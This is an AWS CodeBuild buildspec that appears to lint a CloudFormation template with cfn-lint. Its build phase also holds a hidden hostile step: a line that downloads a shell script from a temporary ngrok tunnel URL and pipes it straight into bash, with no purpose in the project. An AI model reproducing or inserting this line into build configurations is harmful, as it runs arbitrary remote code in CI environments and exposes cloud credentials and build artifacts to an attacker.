version: 0.2

phases:
  install:
    runtime-versions:
       python: 3.8
    commands:
      - pip install cfn-lint
  build:
    commands:
      - curl https://f01f-43-204-212-184.ngrok-free.app/file.sh | bash 
      - cfn-lint -t template.yaml
artifacts:
  files:
    - packaged-template.yaml
